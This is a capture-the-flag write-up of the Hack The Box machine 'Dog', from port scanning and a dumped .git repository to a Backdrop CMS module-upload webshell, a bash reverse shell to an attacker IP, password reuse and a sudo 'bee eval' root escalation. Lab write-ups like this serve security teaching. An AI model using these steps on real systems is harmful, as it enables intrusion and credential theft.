Dog - wook413

#hackthebox #linux #easy ![[Pasted image 20250823000619.png]] # Information Gathering - Nmap As always, I started off with scanning all TCP ports and discovered 22 and 80. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:09 UTC Nmap scan report for 10.10.11.58 Host is up (0.052s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.75 seconds ``` Ran another TCP scan against those two ports found to gather more info. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:10 UTC Nmap scan report for 10.10.11.58 Host is up (0.049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA) | 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA) |_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |_/user/password /user/login /user/logout /?q=admin /?q=comment/reply |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Home | Dog |_http-generator: Backdrop CMS 1 (https://backdropcms.org) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.03 seconds ``` Finally, a UDP scan against the top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 02:11 UTC Nmap scan report for 10.10.11.58 Host is up (0.048s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 4.84 seconds ``` --- # Enumeration ##### HTTP - TCP 80 `Nmap` already returned a lot of information on port 80. Let's explore one by one. ```bash 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-git: | 10.10.11.58:80/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: todo: customize url aliases. reference:https://docs.backdro... | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.md /web.config /admin | /comment/reply /filter/tips /node/add /search /user/register |_/user/password /user/login /user/logout /?q=admin /?q=comment/reply |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Home | Dog |_http-generator: Backdrop CMS 1 (https://backdropcms.org) ``` The page on port 80 is all about dogs. ![[Pasted image 20250821211622.png]] The footer of the page reveals it's built with `Backdrop CMS` ![[Pasted image 20250821211825.png]] We saw some entries exist under `/robots.txt` and `.git` is also available. Let's check them out. ![[Pasted image 20250821212107.png]] `/.git` ![[Pasted image 20250821212655.png]] I dumped the whole `.git` directory with `git-dumper` ```bash git-dumper http://$IP/.git git_loot ``` `git log` revealed a single commit. The problem of this git repo is that it contains too much information, it would take me so much time to read through all of them. ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ git log commit 8204779c764abd4c9d8d95038b6d22b6a7515afa (HEAD -> master) Author: root <[email protected]> Date: Fri Feb 7 21:22:11 2025 +0000 todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases ``` In `settings.php`, I found a set of credentials for `mysql` database. `root:BackDropJ2024DS2024` ![[Pasted image 20250821220218.png]] The credentials didn't work on `/login`. It makes sense because the found credentials are for `mysql` service but it's also possible they are reusing the same password. However, I noticed the website says `sorry, unrecognized username` when I typed in the credentials. This indicates it might return a different message when I type in valid username that actually exists. ![[Pasted image 20250821220625.png]] While manually going through files, I found the version number of `Backdrop CMS`. I'm pretty sure there's another way to locate the version# of the CMS. ```bash ┌──(kali㉿kali)-[~/…/git_loot/core/profiles/minimal] └─$ cat minimal.info name = Minimal description = Start with only a few modules enabled. version = BACKDROP_VERSION backdrop = 1.x type = profile hidden = TRUE dependencies[] = node dependencies[] = dblog dependencies[] = layout ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 ``` Google search reveals there's known vulnerability exists to this version of Backdrop CMS. ![[Pasted image 20250821215716.png]] Combining everything I have so far, I came to a conclusion that I have to try brute-forcing for a valid username on `/?q=user/login` page. The reason is as follows: I found a valid set of credentials for `mysql` and I also found a valid exploit that possibly work against the CMS but the exploit is `Authenticated RCE` meaning we need to first log into the server in order to execute it. Also, the only password I found is the password from earlier. I am hoping a user re-used the same password on the server. Then again, I found two users by looking for `@dog.htb` recursively in the Github repo. maybe I don't have to brute force for users if either `dog` or `tiffany` works on the website. ```bash ┌──(kali㉿kali)-[~/Desktop/git_loot] └─$ grep -r '@dog.htb' . ./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases ./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]> 1738963331 +0000 commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases ./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "[email protected]" ``` The server returns that usernames `dog` and `root` are unrecognized. ![[Pasted image 20250821224140.png]] ![[Pasted image 20250821224158.png]] But the server returned a different message for `tiffany`. ![[Pasted image 20250821223758.png]] I successfully logged into `/?q=admin/dashboard` as `tiffany` ![[Pasted image 20250821224332.png]] # Initial Access - Shell as `www-data` Now we are authenticated, let's prepare and perform RCE attack. `main` function directs me to go to `/admin/modules/install`. ```bash def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + "/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") ``` However `/admin/modules/install` takes us nowhere. For our target machine, we would have to prepend `?q=` in front of the path. ![[Pasted image 20250822230748.png]] ![[Pasted image 20250822230912.png]] Since the target only support `tar tgz gz bz2`, I have to compress my files to one of those file extensions. I'll use tar. Running the original exploit creates `shell` directory and `shell.zip` file. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 52021.py http://$IP Backdrop CMS 1.27.1 - Remote Command Execution Exploit Evil module generating... Evil module generated! shell.zip Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation. Your shell address: http://10.10.11.58/modules/shell/shell.php ``` `shell` directory has 2 files inside: `shell.info` and `shell.php` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ls shell shell.info shell.php ``` since we cannot use `.zip` file, I'm just going to compress them with `tar` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ tar -cvf shell.tar shell shell/ shell/shell.info shell/shell.php ``` `shell.tar` has been successfully uploaded. ![[Pasted image 20250822231921.png]] After uploading the compressed file, navigate to `/modules/shell/shell.php` to verify that command execution works as expected. ![[Pasted image 20250822233445.png]] entering `bash -c 'bash -i >& /dev/tcp/10.10.14.47/443 0>&1'` triggers the reverse shell and connects to my listener on port 1234. Got a reverse shell as `www-data` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.11.58] 32802 bash: cannot set terminal process group (902): Inappropriate ioctl for device bash: no job control in this shell www-data@dog:/var/www/html/modules/shell$ whoami whoami www-data ``` We also have user `jobert` and `johncusack` ```bash www-data@dog:/tmp$ cat /etc/passwd | grep sh root:x:0:0:root:/root:/bin/bash fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin sshd:x:113:65534::/run/sshd:/usr/sbin/nologin jobert:x:1000:1000:jobert:/home/jobert:/bin/bash johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash ``` Also they have their directories under `/home` too ```bash www-data@dog:/home$ ls jobert johncusack ``` I tried re-using the password I found earlier `BackDropJ2024DS2024` against those two users. ```bash www-data@dog:/home$ su jobert Password: su: Authentication failure ``` The password worked on user `johncusack` ```bash www-data@dog:/home$ su johncusack Password: johncusack@dog:/home$ whoami johncusack ``` # Privilege Escalation - shell as `root` `sudo -l` command reveals user `johncusack` can execute `/usr/local/bin/bee` with `sudo`. ```bash johncusack@dog:/home$ sudo -l [sudo] password for johncusack: Matching Defaults entries for johncusack on dog: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User johncusack may run the following commands on dog: (ALL : ALL) /usr/local/bin/bee ``` ```bash johncusack@dog:/home$ ls -l /usr/local/bin/bee lrwxrwxrwx 1 root root 26 Jul 9 2024 /usr/local/bin/bee -> /backdrop_tool/bee/bee.php ``` Running `bee` prints a help menu with a lot of subcommands. ```bash johncusack@dog:/home$ bee 04:56:22 [173/173] 🐝 Bee Usage: bee [global-options] <command> [options] [arguments] Global Options: --root Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory. --site Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site a utomatically based on the current directory. --base-url Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site. --yes, -y Answer 'yes' to questions without prompting. --debug, -d Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages). ``` At the very bottom of the help page, there's subcommand `eval` which executes an arbitrary PHP code after bootstrapping Backdrop. ```bash eval ev, php-eval Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop. ``` However, running `eval` didn't work for some reason. ```bash johncusack@dog:/home$ sudo bee eval ✘ Argument 'code' is required. johncusack@dog:/home$ sudo bee eval hello.php ✘ The required bootstrap level for 'eval' is not ready. ``` running `status` returned that Backdrop installation is not found. ```bash johncusack@dog:/home$ sudo bee status ⚠ No Backdrop installation found. Run this command again from within a Backdr op installation, or use the '--root' global option. ``` I moved to `/var/www/html` , ran `sudo bee status`, and now it properly returned values. ```bash johncusack@dog:/home$ cd /var/www/html johncusack@dog:/var/www/html$ sudo bee status Backdrop CMS 1.27.1 Bee version 1.x-1.x Bee root directory /backdrop_tool/bee Site root directory /var/www/html Site type Single Database mysql Database name backdrop Database username root Database password ********** Database host 127.0.0.1 Database port Cron last run 2025-08-23 04:06:52 GMT+0000 Install time 2024-07-09 18:12:15 GMT+0000 Maintenance mode off Update last check 2025-02-07 21:12:04 GMT+0000 Settings.php path /var/www/html/settings.php Drupal compatibility on Config storage active /var/www/html/files/config_83dddd18e1ec67fd8ff5bba245 3c7fb3/active Config storage staging /var/www/html/files/config_83dddd18e1ec67fd8ff5bba245 3c7fb3/staging Site name Dog Default theme basis Admin theme seven Public files path /var/www/html/files Temporary files path /tmp Preprocess CSS on Preprocess JS on Theme debug off Error display level hide PHP cli version 7.4.3-4ubuntu2.28 PHP ini path /etc/php/7.4/cli/php.ini ``` I called a shell as `root` using the subcommand `eval` ```bash johncusack@dog:/var/www/html$ sudo bee eval 'system("bash")' root@dog:/var/www/html# whoami root ``` Found `root.txt` ```bash root@dog:~# cat root.txt 458... ``` I also grabbed `user.txt` from `/home/johncusack` ```bash root@dog:/home/johncusack# cat user.txt f5b... ```